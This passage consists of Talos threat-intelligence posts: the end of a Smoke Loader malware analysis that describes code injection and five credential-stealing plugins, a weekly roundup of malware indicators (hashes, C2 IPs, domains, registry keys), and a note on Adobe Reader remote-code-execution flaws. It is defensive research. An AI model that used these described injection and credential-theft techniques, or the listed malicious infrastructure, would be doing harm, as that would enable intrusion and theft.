For each child window, the injector calls EnumPropsA to iterate through window properties until it finds UxSubclassInfo. This function also showcases some of the anti-analysis techniques employed by this sample’s packer. There are several unnecessary jumps for control flow obfuscation, including simple opaque predicates leading to junk code.

“Deobf_next_chunk” takes arguments for size and offset for the next chunk of code to deobfuscate and execute, so the bulk of the malicious code is deobfuscated as needed, and can be obfuscated again once the next chunk is loaded. The obfuscation method is a simple one-byte XOR with the same hardcoded value for every piece.
These anti-analysis techniques are accompanied by anti-debugging and anti-VM checks, as well as threads dedicated to scanning for processes and windows belonging to analysis tools. These features complicate forensics, runtime AV scanners, tracing, and debugging.

Fig. 4 - Trigger malicious event handler via WM_NOTIFY and WM_PAINT

Once the shellcode and UxSubclassInfo data are written to the remote process, the injector calls SetPropA to update the property for the window, then sends WM_NOTIFY and WM_PAINT messages to the target window to force it to trigger the malicious event handler that executes the injected shellcode.

Injected shellcode: Smoke Loader

Smoke Loader received five interesting plugins instead of additional payloads. Each plugin was given its own Explorer.exe process to execute in, and the malware used older techniques to inject each plugin into these processes. Each Explorer.exe process is created with the option CREATE_SUSPENDED, the shellcode is injected, then executed using ResumeThread. This is noisy and leaves six Explorer.exe processes running on the infected machine.

Plugins

As mentioned above, the plugins are all designed to steal sensitive information from the victim, explicitly targeting stored credentials or sensitive information transferred over a browser. Each plugin uses the mutex "opera_shared_counter" to ensure multiple plugins don’t inject code into the same process at the same time.

Plugin 1:

This is the largest plugin with approximately 2,000 functions. It contains a statically linked SQLite library for reading local database files.

It targets stored info for Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird.

Recursively searches for files named logins.json which it parses for hostname, encryptedUsername, and encryptedPassword.

vaultcli.dll - Windows Credential Manager
POP3, SMTP, IMAP Credentials

Plugin 2:

This plugin recursively searches through directories looking for files to parse and exfiltrate.

Outlook
*.pst
*.ost
Thunderbird
*.mab
*.msf
inbox
sent
templates
drafts
archives
The Bat!
*.tbb
*.tbn
*.abd

Plugin 3:

This one injects into browsers to intercept credentials and cookies as they are transferred over HTTP and HTTPS.

If "fgclearcookies" is set, kills browser processes and deletes cookies.

iexplore.exe and microsoftedgecp.exe

HttpSendRequestA
HttpSendRequestW
InternetWriteFile
firefox.exe

PR_Write in nspr4.dll or nss3.dll

chrome.exe

unknown function inside chrome.dll

opera.exe

unknown function inside opera_browser.dll or opera.dll

Plugin 4:

This hooks ws2_32!send and ws2_32!WSASend to attempt to steal credentials for ftp, smtp, pop3, and imap

Plugin 5:

This one injects code into TeamViewer.exe to steal credentials

IOC

B98abdbdb85655c64617bb6515df23062ec184fe88d2d6a898b998276a906ebc (IO08784413.doc)
0be63a01e2510d161ba9d11e327a55e82dcb5ea07ca1488096dac3e9d4733d41 (Trickbot)
b65806521aa662bff2c655c8a7a3b6c8e598d709e35f3390df880a70c3fded40 (Smoke Loader)

Mutex: opera_shared_counter

Trickbot IPs:
185[.]174[.]173[.]34
162[.]247[.]155[.]114
185[.]174[.]173[.]116
185[.]174[.]173[.]241
62[.]109[.]26[.]121
185[.]68[.]93[.]27
137[.]74[.]151[.]148
185[.]223[.]95[.]66
85[.]143[.]221[.]60
195[.]123[.]216[.]115
94[.]103[.]82[.]216
185[.]20[.]187[.]13
185[.]242[.]179[.]118
62[.]109[.]26[.]208
213[.]183[.]51[.]54
62[.]109[.]24[.]176
62[.]109[.]27[.]196
185[.]174[.]174[.]156
37[.]230[.]112[.]146
185[.]174[.]174[.]72

Smoke Loader domains:
ukcompany[.]me
ukcompany[.]pw
ukcompany[.]top

Dropped File: %appdata%\Microsoft\Windows\[a-z]{8}\[a-z]{8}.exe

Scheduled Task: Opera scheduled Autoupdate [0-9]{1-10}

Conclusion

We have seen that the trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date. Organizations can utilize a multi-layered defensive approach to detect and protect against these kinds of threats. Talos continues to monitor these campaigns as they evolve to ensure that defenses protect our customers. We strongly encourage users and organizations to follow recommended security practices, such as installing security patches as they become available, exercising caution when receiving messages from unknown third parties, and ensuring that a robust offline backup solution is in place. These practices will help reduce the threat of a compromise, and should aid in the recovery of any such attack.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW,NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

↧

Threat Roundup for June 29 to July 6th

July 6, 2018, 9:48 am

≫ Next: Vulnerability Spotlight: Multiple Adobe Acrobat DC Remote Code Execution Vulnerabilties

≪ Previous: Smoking Guns - Smoke Loader learned new tricks

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we've observed this week — covering the dates between June 29 and July 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive, and is current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this roundup are:

Win.Malware.Separ-6598261-0
Malware
Separ is spyware that has been delivered via several different spam campaigns. The malware establishes persistence to survive system reboots, and it's able to collect sensitive information by capturing login attempts via a web browser. It disables the Windows firewall if present, propagates and invokes scripts during runtime, and relies on FTP to upload any collected data.
Win.Malware.Daqc-6598201-0
Malware
Daqc is a trojan that collects sensitive information from the infected host and exfiltrates pieces of the collected data over time to a command and control (C2) server. It drops several database files and locks files to properly manage the data it has collected or is queued to collect at a future time.
Win.Malware.Tspy-6598050-0
Malware
Tspy is a trojan with several functionalities. It establishes system persistence to survive reboots. It also contacts domains related to remote access trojans (RATs) but are also known to be hosting C2 servers that send additional commands to the malware. The samples are often packed and contain anti-debug features intended to delay manual analysis.
Win.Malware.Fareit-6597973-0
Malware
Fareit is a trojan with a significant history associated with malware distribution. It is mainly an information-stealer and malware downloader network that installs other malware on infected machines.
Win.Malware.Razy-6596077-0
Malware
Razy is oftentimes a generic detection name for a Windows trojan. Although more recent cases have found it attributed to ransomware that uses the .razy file extension when writing encrypted files to disk, these samples are the former case. They collect sensitive information from the infected host, format and encrypt the data, and sends it to a C2 server.
Win.Malware.Zusy-6596071-0
Malware
Zusy is a trojan that uses Man-in-the-Middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user access a banking website, it displays a form to trick the user into submitting personal information.

Threats

Win.Malware.Separ-6598261-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
- Value Name: lodhgyuuuf

Mutexes

716BCAD1::WK
DILLOCREATE
4C0::DA783779D0

IP Addresses

198.23.57.8

Domain Names

ftp.freehostia.com

Files and or directories created

ZREA.vbs
nimiki09.vbs
enikiol03.bat
enikiol02.bat
BReader.exe
%AppData%\Local\4Adobe\4low
%AppData%\Adobe\Adobe INC\AadobeRead\BReader.exe
%AppData%\Adobe\Adobe INC\AadobeRead\Adobeta.exe
%AppData%\Adobe\Adobe INC

File Hashes

09ebe700700a0e5e49d994093786f6c1bc9d3c400edc94b31693ef5961250d81
12e2ba4b4a310edf9cd97405541565e20d9ea6259d86d96a36fc8b676babb228
14c4a3fd18cad81c55ff4aa192803b748d8810900602c89c26114eb80c9db988
198f46e81e496d6bbe573c21eff095f102d0afa877a51d3de30a2b21f90ed179
21d006b8f12a6b2e3126f3a6cef4f621c314a9dc21be6ffe51950f816f6a88c9
273436ba78c9973251e48bc2eb7771ded5ce3f9183d798d4663672f54ffeb2e2
2b05da4dbfe7ffb80c08383d75e79cc93cf22b6b4a4ad1964f360d1a77a2e9ae
2d8fb96ba74ce2f9f9e8030c4c62606d1fea677cd845f96ee8191250d76f1943
354cf3031b2679f885969746afef780bb1765b0f32613afb6490d5e60b7fe6bc
3ed4b85af6b20e6c2a2b1dba1f76f9e2fae9e8664a0b21cfc77b75fc7b585168
3ef31d4a0bccee0994a4ee525b679da1fd2664f3d96d20371297f6f6645a2ced
3f735ba16d51af841f5a48c9be5a2cb004df275c71cbbdd3497bfe34460f9c93
403d91b31d44acb4a67b5b0dd7679971bedc722244f1b705adfa095632d18cf3
47cd0d0181ae2d2fee85ca67b26fb4366fd44e0391f4c81e7aee2de82de2e87c
4c76b5e7ad6242df21d5dc2094d4dbf6d7ab551d2055844ddb0188d410a02dbd
54ad6cdb5dbdbc93f70e0e69d3e98503e96ae407de19c0d1fb3f4e0d3147e0e5
5c36e8d71fa4060e98d3c6274d7332af963e0f41e3d2eef9eb0b5d96554cb94b
5e43fa2988b68c9c066fe804167a9a0a0e82537359771060f894ee295c1164b4
61540809d55eaa23ba0ac82ff4b530823c93fbc8e7097ccaeb8329e0eb1e48c1
6d7019e4f1e02713046fedb121d15c9a423b8502e792ff42c7896c3b4d9f826d
6f13c5e83ae42cbb755a44c3c45075043983d0eba2846b63442471577bdf6a98
6f9c0cb13cb611de6697837c7dcdcc2899d8497e55258a2a26a41b26e5e7a8de
7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60
76a98ee8f9ff749ea39acd024859ea991b2b43e79e37cb131a1a53be614bd753
79789706985bcb5afeffed63805994cbe09966da0544e18a0a059a57064d7039

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Daqc-6598201-0

Indicators of Compromise

Registry Keys

<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2

Mutexes

IP Addresses

Domain Names

necter7.ru

Files and or directories created

%AppData%\mvsh\sghbn.exe
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\mvsh.vbs
%AppData%\D282E1\1E80C5.lck

File Hashes

00c8e16c0153a40945b77692bbc28d765e6fc1a5d7100ff67dc7d4a3cf7c250c
011e0b204c466885b489a18062a763a3eab681d1f6d3ddc7584ad89429935664
0681fbcb805b64a7a85ad6883e8c66af4d1cbd0cbc983e8c7c57868885c8eddb
0a0c092a8a390432b9b31b8d7cc9b4780fad2b8878d0bcfdda09f7f9322b1004
1bc4781824a84300edc2f1fa97e42cddce96b273c09fda794f9e30a44ae4c6d5
273c7bc44acc510531dafb34a25aa0463ce28c262c360596f2387f0b3067c0fe
2a63210f0832f22ff67bc5333c3e2f8e327c6353920d6d687c1dec8558e50a83
2a9be0b39fc7f3cd3214ba6854699e6857ba853b175b98d0fe10e151dbce9f4e
2ce787599acee9837624bfa274d04e659ac1fba27a200e451d8369025a3c3b02
331dd1d9b1f53c72bb628913a0d173eb701cdf68de713c1b94bcfef1be8be8f1
36dcfa6c8cb09c85d25b9cfc4ff655a6b7d4ad77b4f75107734e956b2c0c4c52
4278d609c70419e054b5d514e847f05d9e854a6f67c8ca4a17ce02f14d18980e
43957c1ffbb1ae837e2fe6d97603fa0c686f131beebe5c8c17e9c384bd2e5d9d
46a603905dda179887be97eb0894c408613857261d275056d46aa174d1063888
49560519bd1ad245ebcf596fa867db44f5460a4b6e952393c222169fae3458c1
5309ac8962997edc05e88bc99f259d4a0788f08ed0ab92bfeb2075410a0f53ce
60140f334d05733c9e80ec951bbf57d2355e7421197806f3e5373d87feebaca8
69079ab9bf5475c7f561a849a191228e7583c7000f56623f4c2824399ab5fadf
748374631d589f14126473dee5faabbb03de6f436be9ba1f4e9db4a43ad5f335
7ce2a8377d841c6c35b4af7b97df7e1edf41d519026090439b0fce83ed94237e
7f2167ad8d2c8523477e5c89bff7e43c4aaa63bb67738c99f3dcf699f5d23878
87e4364c1075f01bbb5d2e71532eafa03319925cc76a81175f1939e865d73a22
8ded9c78e10011fcc6fd9c7501b54510d64be29ea7a9512018d22a43f9e3b5be
8f6841a0f19f1626723f297a3ada097342ff10b6f4242e48e3b14c8528381de9
9cd31bad005306e5586bd20d5c027d15bd2bdc0f904f3f839309a25c30ffe417

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Tspy-6598050-0

Indicators of Compromise

Registry Keys

Mutexes

3749282D282E1E80C56CAE5A

IP Addresses

31.220.56.187

Domain Names

Files and or directories created

\PC*\MAILSLOT\NET\NETLOGON
%AppData%\D282E1\1E80C5.lck
%AppData%\D282E1

File Hashes

014e34668fdca31f2a599d3fc772fa60893b2790227fe283b6ed73fe207ab091
09df166cabf8e547ba597ece2efac55626fc5148dceacfa85da87bcb4753376e
2b6b2a20912a1d906b374ab10fb6c4ae4d0b3509b5f22543357372ec58e0ebed
3be01ef8167c8be00af7e4c5d6fff6a7429cf31094074fbe9cf2565b4cb67d5b
3f3ff0bfd3eb8ea896a5eaf39c95799124d5e48c892428a1c33395b53fb99d34
4ba249143540292a58750d78c60baaf1903b0bdb4b39447a7cc75e933ba4d360
4ebbaeb26cc27b394e81fd2c361fc21d8ec2bcebd120d2e23b3ab8de09c6de89
4fc79ecb69c7fca766f4da8fbe6c20d35cf45c56fa79dd2599a086683f495c12
51ee89debd42065508888bd475221990c00213e711b9f835768b6c10ff69526b
5548a1dd962ff1c290b39ca973922fe0f4b6906a9ee89504ee935ba71cf41138
572b052bb1eda202ebb968e4c652ccd6b5dc3bb749c3cea41620f095a1ac5192
5a14367912fffeae4298445fb401777c000e8b3fb30bfd148156107b10225b01
617aeefe2f7f063a48b968dc4f08d1ba11165f08a220e802b23ef7dfa80c5e40
66d4fc50ab34bafc66090beccca49fb1cdc59051201f9908836e8ef0b212957a
68b943af3db8015deaf948718711ce477934ded7b26818bc284541744005b89e
6ebd3a5c153e185cbf3aac1e4e8724cece65990726bd75cb3182e40510a27db3
807f1c87820ce553653f29c4cd4aa6bdb12007bdddfb78cc7646a61b7be52a52
80e118cfbd1c4af5658bea2f9d0ab233f015e0add74ca766fde4b9f208db462c
86579c2189c128a9c858acfeb60139323fe01398cee2de6d2fa7e4ef92e937a5
8aca4e49934582ff2db33c822b0d4d32d2623638485df2d8069dcf5572c0d931
90f20d1e2b755846fae5465a086b93937a641cfb4a3337794d5c6dab6f927ea5
a2c8af1f4b90fbd2db57433f99f8680df4b529e5580c7d951a48effe8b0783a5
aba1625cf886e5ec14860510648e77b4df66b81f6b01ca5627ee376f1c6e203b

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Fareit-6597973-0

Indicators of Compromise

Registry Keys

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
- Value Name: J2UXTX7H4BT

Mutexes

AE7ED74491CA89C0FD1212B015FD0F24
922ORSE7XC24WH0Z
8-3503835SZBFHHZ

IP Addresses

98.124.199.96
50.97.212.250
38.18.228.192
23.247.23.36

Domain Names

www.understandinggod.faith
www.ethmined.com
www.yyphg8.com
www.dariomatamoros.com
www.ecomepiphany.com
www.enarhcxx.com
www.ferertya.com
www.rgpclaw.com
www.starcarpetcleaningpros.com
www.available2.info

Files and or directories created

%LocalAppData%\Temp\rhvh0.exe
%AppData%\922ORSE7\922logrv.ini
%AppData%\922ORSE7\922logri.ini
%AppData%\922ORSE7\922logim.jpeg
%AppData%\922ORSE7

File Hashes

06700dc880f285572c711fc4adfce57045158ed481d2effca8f4bd07a46ebc6e
24e59d09af4f3ff5fb90ad6468c6e5a03dff284cf28b09f63602e59c17c96c70
2ddc6c4ecf32333927cc32169eb0c291ff3265ff979b6436ce8650072214b58b
328261b4d00e03b8ff7572b1e24b5caf5216579007105761a71207eb31a052d9
466d77d24f1efc960036ec58173872a99a91eb5862bf11079de7dacdfe149926
4706ebc86e7d1e2a179ceeed68948948b1dc864d41b0362e5c69796a674e8429
49cba36aadf7d8d9fae0b76aa465a0d0dc8d24ce4b5325acd6850140d632872a
56d6c66c01fc39a1522a0faa2dbc8d63df17b058fe5bc61a042a727fb156a16d
5c3b4262b04a7b092481019181967ecd4dfe7428845c5f2320fea0960e321f64
5e0c32b0a8425ea362554fa58dfea23c6410aec3c02200ba9fa5ebf04a2f6853
6324c7d1a57f57b9407c78cfdcfd0c60115389b56953ccbd0cc450d616cd6be3
6630e3c3efa79e74d3974abca99c7b6b2260e271b17e87875d3939425c649705
7ff5dc962d9d73109f54ab6dfc7b3242f560f8758fb683070a5ce8a3d3d5bfd5
9d070ad80ebdd96767fef1b1478037125726f70602924bb400128db3765ab8b8
a14660359321c5cc109e2ea0cd8effa8efb913d035c7d2aa85a9d7fb72914e0d
ab6550747aa04bd64e002fb84f2fb1a9c3d267328f9b4475c31b5e8e41a2197b
b6aae639a221efc5c4fb234e554e6123e27e19e90180f22826902d1a61a55eda
c37614c78fca54274fdc1d6958ddae14a833791eac9ca1fe2eb6d86f27589936
c47de79387cae47c50619e921a182de369f4552a44f447f30777d6dc4dde12de
c50019481f97c3b97b4155f06484e90ed2980583efd9146a981f598301802134
cb10d039bd219f5fce8ee71a0e447ee1f7a59413613db2efb898314159912a7e
d259365b6e3d0f313b5dd634600869f68b3460a4e8acac6f0306ff152cd44340
d56c7bb7b58cc99668118ef277a62b85161360546500c12e5ea2f721b456d65f
d6e9ec4bea5aff79aead3c25e17f3708aabb9aaf797f9752d10d4e84a7f87151
dba3edee7d56ed9cce110b3a172e607639dcb18901a78c8d5721c4f21acd43cd

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Razy-6596077-0

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

Mutexes

WmiApRpl_Perf_Library_Lock_PID_968
Windows Workflow Foundation 4.0.0.0_Perf_Library_Lock_PID_968
ServiceModelOperation 3.0.0.0_Perf_Library_Lock_PID_968
PerfNet_Perf_Library_Lock_PID_968
Outlook_Perf_Library_Lock_PID_968

IP Addresses

107.180.26.90

Domain Names

asli-id.com

Files and or directories created

%LocalAppData%\Temp\Ph4.exe
%AppData%\K-Mart Corp\K-Mart Corp.exe
%AppData%\K-Mart Corp

File Hashes

058f2a286b9dbce25b14efa7a4321505d443a97c11d773024b2e222c54894dfc
0931d88de9c4a7af4484d1a2285f001512c83a721d6e7d9177d6fa3c9c2ff494
0c1609585500a71c55999ca82ff617cf209e09ef640d35d8b334bc0949e1f5c1
0d4b4e859ba805e854df7f44c31745e554275b9c36997c0516b5acad4a29c739
232b077e1df7e90f39f92200c9424918eff1c34d2adf98befb28a2cc664e133c
2f670ff3dd609f23f4c7213a20e5f87e01d1895c08045b7ff70b746b11d7797e
32d5a8609132a6619c27d5da066d6cd0c01ede44e23ae88b3e1a94c31264a2b0
385ebc30d9bf602ce39b8b2d7d09787fd859fca5391f7e282f9a57fb1a7792fc
3b65e590fbd2be761a6cbe540c680d63358dddfc838acd3164a1580dfa3782c6
3f0ce29604df46a478183cba3fe075ac92fbc70221b7163833c9bab62b216aae
40b9d27d3e3e78e52c5df9a060126d0111e6337e86e50962cce38c814ce0c365
419c206b2701529e1475fafde37adad222eceef28a5b6b0ba1e34232ec3e95bd
447ab1be7b297d6b592cbad8f6c35cb269e25c817d6900726fd131234427b898
5cd16c9b64a18d8b8852c0e113b3347e630518e2c034ee8ecdf11c048a5e82fd
5d97798b9fbc7692c9dbcfb0643da0de491b36e2e0cf51060254a2dd6238ea62
608b6dad966c287cdb214acc6883a7bbbb2a0bb12f0dae2a4eaea451186aa899
61ac9dae3f72b71a6128af5207f00d2e48243423596fde881811e5525a53d509
63d3cf1bbf4e3352033506d7feccd4366361b0ccccf6efc7d1bde38593f396dc
6cba1c23e95028056557db02a25d81a6882ca381f44153b338a8fb028f5a81d1
72f3289960744faf657f7f84e98d8f1da3576451aa23f3813e00fcf956920cb1
73f6dee570c360d0b2c6b4f1669aadbe1fda320838f80c8ffa030ba3b6f61738
751269d78fdf8e244295d87a76a839b15672f5d0e6e7bc62cdd31f1deb5c0fa5
75bdd5417105c495fd111bcaafcbed1f37a1e77c64d788f5884df5018c82a4e6
760a2cb6fae52b26406a38e6a93952d2162c27c6712842c8d125685b2b540264
79cd4f4accadc3edcfa90b11b19e56fa4a6a6a5150c3e2f9a467154523ff1870

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Zusy-6596071-0

Indicators of Compromise

Registry Keys

<HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
- Value Name: internat.exe

Mutexes

Sandboxie_SingleInstanceMutex_Control
Frz_State

IP Addresses

47.74.230.86
176.9.193.212

Domain Names

ffmovne.top

Files and or directories created

%LocalAppData%\Temp\Non-resident RunPE Loader(1).exe
%LocalAppData%\Temp\flashplayer30_xa_install(2).exe
%LocalAppData%\Temp\upd63bc908e.bat
%LocalAppData%\Adobe\83474DC8-60A7-4AE9-9182-F2D369E40051
%AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\bookmarks-2017-10-03.wyz

File Hashes

00c8d056d3fef3bba3eb185bd837c1fd051376a7e22356a4a82f38f8974cc387
0662906a29d782593e50f6e39dadcf45219ab7265c920406460b77c3501c5413
0744a0cf29c89debc833f46ff72954a860a3e01e1c7b22655e82c5b54bde1158
0864a2254013f1a9d642fe0bf2ecc7ab04933660e2dcf2198e348115b743b422
09df2594832182d1a80285cae34d488db1bed8206e962d20a5f59e78439a70f1
0d16cfb1916b5c969b8ffada7ccbcbbdabe8d479ad713f57f939c47b42150bd5
0eb0e116cd371b7b2b8464056f386a67894525ac7f195d76e45dad6d03ba5c60
18fccd80b2d4b1052db0ce9873204c9a607faae9b69a89013f12423ce01b2aec
1956f981e134f4f3967f6e6c4c5ba5890cf06589e3556466a19c63105fd8b0e1
19e65a425ba57b23ba1238d268335396b245d1393527411a61b46ddfb1a50531
1a42b7494191af666910b9b1c60af40eacd06e7444dd8e01bc4d932134622269
1bdb9eb3a95b52e1833ee7d48c69b3d07134d91c71214637d7a3947582ee5ea0
1f918795596a888660a6ea88157fb86c38c533e4d57a6105801c80abd5ea0008
207b7eab5d6d8bb1e91e188a4c7e6a9d60b5312c5505a0183918b81e83aa63fb
21a48b04e16128278123f694574009104f2d5a8364c38de4cdd52259bf1ee1dc
23cea222de3f0a61da1046f08c77063edb20d9d89add0ab77849909f853d9cf9
23f20614cf3dae1ecfd6291f90cca1645ab4784d449e642dd170cd3e552b24ee
2c224bb1f73819ab08c1a79f553cb348ab9d460fe16ce5950c81d77cba801ada
2cbc5d0f6342db2c3a1af4fc943c69c986b73bd4ed36b69cbbbe89d40c00179c
323e82e0a8fe16b671aab982297a8e22358fdf6aff8d1a6d19f6f401ea24a024
32f0012d9609b9e4bd78838e7f53d4d929174e64ba898ea1b5cd747771ec3862
35a6fe0d09b87c7098e5acd2e23ad034ae7205816a27fd292d940e2b5fb31c57

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

↧

Vulnerability Spotlight: Multiple Adobe Acrobat DC Remote Code Execution Vulnerabilties

July 10, 2018, 10:31 am

≫ Next: Microsoft Patch Tuesday - July 2018

≪ Previous: Threat Roundup for June 29 to July 6th

Discovered by Aleksandar Nikolic of Cisco Talos

Overview

Today, Talos is releasing details of new vulnerabilities within Adobe Acrobat Reader DC. Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger these vulnerabilities.

TALOS-2018-0569 - Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability (CVE-2018-12812)

A specific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found here.

TALOS-2018-0590 - Adobe Acrobat Reader DC Collab newWrStreamToCosObj Remote Code Execution Vulnerability (CVE-2018-12756)

A specific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found here.

TALOS-2018-0592 - Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability (CVE-2018-12815)

A specific JavaScript code embedded in a PDF file can lead to a use-after-free condition when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found here.

Known vulnerable versions

Adobe Acrobat Reader DC 2018.011.20038

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 46292-46293, 46550-46551, 46634-46635

↧